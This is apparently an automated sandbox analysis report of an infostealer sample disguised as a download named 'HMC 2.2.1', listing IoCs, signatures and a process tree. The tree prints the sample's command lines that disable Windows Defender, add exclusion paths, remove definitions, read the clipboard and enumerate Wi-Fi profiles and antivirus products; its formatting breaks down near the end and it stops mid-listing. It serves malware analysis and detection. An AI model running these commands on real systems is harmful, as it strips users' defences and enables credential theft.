Analysis

max time kernel: 216s
max time network: 218s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-06-2024 14:33

Static task: static1
URLScan task: urlscan1

Behavioral task: behavioral1
  Sample: https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
  Resource: win10v2004-20240426-en

Behavioral task: behavioral2
  Sample: https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
  Resource: android-x64-20240603-en

Behavioral task: behavioral3
  Sample: https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
  Resource: macos-20240410-en

General

Target: https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s

Malware Config

Signatures
Command and Scripting Interpreter: PowerShell
Processes:
  pid   process
  5704  powershell.exe
  3756  powershell.exe
  4696  powershell.exe
Drops startup file 1 IoCs
Processes:
  description   ioc                                                                                        process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.exe  runtime.exe
Executes dropped EXE 7 IoCs
Processes:
  pid   process
  1512  HMC.exe
  4580  expections.exe
  4804  expections.exe
  1900  runtime.exe
  5076  errorlog.exe
  3124  runtime.exe
  5696  rar.exe
Loads dropped DLL 61 IoCs
Processes (distinct pid/process rows; the 61 listed entries repeat these):
  pid   process
  4804  expections.exe
  3124  runtime.exe
  5076  errorlog.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
  resource  yara_rule
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\python311.dll  upx
  behavioral1/memory/4804-504-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_ssl.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_sqlite3.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_socket.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_queue.pyd  upx
  behavioral1/memory/4804-556-0x00007FFA7E130000-0x00007FFA7E13F000-memory.dmp  upx
  behavioral1/memory/4804-555-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\select.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\libssl-1_1.dll  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\libcrypto-1_1.dll  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_hashlib.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\sqlite3.dll  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_bz2.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_lzma.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_decimal.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\unicodedata.pyd  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\libffi-8.dll  upx
  behavioral1/memory/4804-584-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmp  upx
  behavioral1/memory/4804-587-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmp  upx
  behavioral1/memory/4804-593-0x00007FFA7DB20000-0x00007FFA7DB2D000-memory.dmp  upx
  behavioral1/memory/4804-592-0x00007FFA68930000-0x00007FFA68944000-memory.dmp  upx
  behavioral1/memory/4804-591-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmp  upx
  behavioral1/memory/4804-590-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmp  upx
  behavioral1/memory/4804-586-0x00007FFA7E110000-0x00007FFA7E11D000-memory.dmp  upx
  behavioral1/memory/4804-585-0x00007FFA68950000-0x00007FFA68969000-memory.dmp  upx
  behavioral1/memory/4804-577-0x00007FFA78190000-0x00007FFA781B3000-memory.dmp  upx
  behavioral1/memory/4804-575-0x00007FFA78C10000-0x00007FFA78C29000-memory.dmp  upx
  behavioral1/memory/4804-574-0x00007FFA79010000-0x00007FFA7903D000-memory.dmp  upx
  C:\Users\Admin\AppData\Local\Temp\_MEI45802\_ctypes.pyd  upx
  behavioral1/memory/4804-639-0x00007FFA62B50000-0x00007FFA62C6C000-memory.dmp  upx
  behavioral1/memory/4804-846-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmp  upx
  behavioral1/memory/4804-845-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmp  upx
  behavioral1/memory/4804-844-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmp  upx
  behavioral1/memory/4804-833-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp  upx
  behavioral1/memory/4804-836-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp  upx
  behavioral1/memory/4804-1015-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmp  upx
  behavioral1/memory/4804-1009-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp  upx
  behavioral1/memory/4804-1010-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp  upx
  behavioral1/memory/4804-1069-0x00007FFA7E130000-0x00007FFA7E13F000-memory.dmp  upx
  behavioral1/memory/4804-1081-0x00007FFA62B50000-0x00007FFA62C6C000-memory.dmp  upx
  behavioral1/memory/4804-1080-0x00007FFA7DB20000-0x00007FFA7DB2D000-memory.dmp  upx
  behavioral1/memory/4804-1079-0x00007FFA68930000-0x00007FFA68944000-memory.dmp  upx
  behavioral1/memory/4804-1077-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmp  upx
  behavioral1/memory/4804-1076-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmp  upx
  behavioral1/memory/4804-1075-0x00007FFA7E110000-0x00007FFA7E11D000-memory.dmp  upx
  behavioral1/memory/4804-1074-0x00007FFA68950000-0x00007FFA68969000-memory.dmp  upx
  behavioral1/memory/4804-1073-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmp  upx
  behavioral1/memory/4804-1072-0x00007FFA78190000-0x00007FFA781B3000-memory.dmp  upx
  behavioral1/memory/4804-1071-0x00007FFA78C10000-0x00007FFA78C29000-memory.dmp  upx
  behavioral1/memory/4804-1070-0x00007FFA79010000-0x00007FFA7903D000-memory.dmp  upx
  behavioral1/memory/4804-1068-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp  upx
  behavioral1/memory/4804-1067-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp  upx
  behavioral1/memory/4804-1078-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmp  upx
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  106   api.ipify.org
  118   ip-api.com
  123   api.ipify.org
Detects Pyinstaller 1 IoCs
Processes:
  resource                                            yara_rule
  C:\Users\Admin\Downloads\HMC 2.2.1\x64\runtime.exe  pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
  pid   process
  5484  WMIC.exe
  2824  WMIC.exe
  808   WMIC.exe
  1728  WMIC.exe
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
  pid   process
  2632  tasklist.exe
  5628  tasklist.exe
  5532  tasklist.exe
  1396  tasklist.exe
  3196  tasklist.exe
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
  description        ioc                                                                process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

Kills process with taskkill 12 IoCs
Processes:
  pid   process
  5724  taskkill.exe
  5736  taskkill.exe
  2284  taskkill.exe
  5040  taskkill.exe
  5584  taskkill.exe
  6096  taskkill.exe
  5264  taskkill.exe
  4120  taskkill.exe
  920   taskkill.exe
  4824  taskkill.exe
  6044  taskkill.exe
  3272  taskkill.exe
Modifies registry class 1 IoCs
Processes:
  description  ioc                                                                                                                                                                                                               process
  Key created  \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{16D0BE5F-2751-4D9C-8F9D-D2487CB45285}  msedge.exe
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes (distinct pid/process rows in order of first appearance; the 54 listed entries repeat these):
  pid   process
  2344  msedge.exe
  3664  msedge.exe
  4792  identity_helper.exe
  3932  msedge.exe
  4928  powershell.exe
  4696  powershell.exe
  3756  powershell.exe
  5524  powershell.exe
  5704  powershell.exe
  5140  msedge.exe
  5584  powershell.exe
  5872  powershell.exe
  1368  powershell.exe
  1584  powershell.exe
  5964  powershell.exe
  2928  powershell.exe
  5748  powershell.exe
  4468  powershell.exe
  4388  msedge.exe
  4168  msedge.exe
  5260  identity_helper.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
Processes (distinct pid/process rows; the 28 listed entries repeat these):
  pid   process
  3664  msedge.exe
  4168  msedge.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (one row per process, tokens listed in the order reported; 64 entries in total, the table is cut off after the last row):
  pid   process         Token:
  2236  7zG.exe         SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege
  2632  tasklist.exe    SeDebugPrivilege
  3196  tasklist.exe    SeDebugPrivilege
  4928  powershell.exe  SeDebugPrivilege
  4696  powershell.exe  SeDebugPrivilege
  3756  powershell.exe  SeDebugPrivilege
  5420  WMIC.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  5628  tasklist.exe    SeDebugPrivilege
  5420  WMIC.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  5524  powershell.exe  SeDebugPrivilege
  5704  powershell.exe  SeDebugPrivilege
  5740  WMIC.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege
Suspicious use of FindShellTrayWindow 64 IoCs
Processes (distinct pid/process rows; the 64 listed entries repeat these):
  pid   process
  3664  msedge.exe
  2236  7zG.exe
Suspicious use of SendNotifyMessage 48 IoCs
Processes (distinct pid/process rows; the 48 listed entries repeat these):
  pid   process
  3664  msedge.exe
  4168  msedge.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (distinct rows; the 64 listed entries repeat these):
  description                       pid   process     target process
  PID 3664 wrote to memory of 2256  3664  msedge.exe  msedge.exe
  PID 3664 wrote to memory of 1184  3664  msedge.exe  msedge.exe
  PID 3664 wrote to memory of 2344  3664  msedge.exe  msedge.exe
  PID 3664 wrote to memory of 4268  3664  msedge.exe  msedge.exe
Processes (child processes are indented under their parent)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 3664

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa797e46f8,0x7ffa797e4708,0x7ffa797e4718
    PID: 2256

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
    PID: 1184

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID: 2344

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8
    PID: 4268

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
    PID: 684

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
    PID: 3148

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
    PID: 1812

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 4792

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
    PID: 2280

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
    PID: 3772

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
    PID: 2860

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
    PID: 1956

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
    PID: 3560

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
    PID: 2872

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
    PID: 4876

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:1
    PID: 4720

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2520 /prefetch:1
    PID: 4496

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5948 /prefetch:8
    PID: 5020

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 3932

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
    PID: 5284

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
    PID: 5840

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5932 /prefetch:8
    PID: 5688

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3100 /prefetch:8
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID: 5140

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2068

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4604

C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 4836

C:\Program Files\7-Zip\7zG.exe
  Command line: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\HMC 2.2.1\" -spe -an -ai#7zMap19409:80:7zEvent5334
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID: 2236

C:\Users\Admin\Downloads\HMC 2.2.1\HMC.exe
  Command line: "C:\Users\Admin\Downloads\HMC 2.2.1\HMC.exe"
  - Executes dropped EXE
  PID: 1512

  C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DADA.tmp\DADB.tmp\DADC.bat "C:\Users\Admin\Downloads\HMC 2.2.1\HMC.exe""
    PID: 5060

    C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe
      Command line: "x64\expections.exe"
      - Executes dropped EXE
      PID: 4580

      C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe
        Command line: "x64\expections.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        PID: 4804

        C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe'"
          PID: 2724

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4696

        C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          PID: 536

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4928

        C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
          PID: 432

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1780
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3196 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1192
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:3808
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵PID:1008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2484
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4468
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5716
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵PID:864
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵PID:5780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:4960
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:5640 -
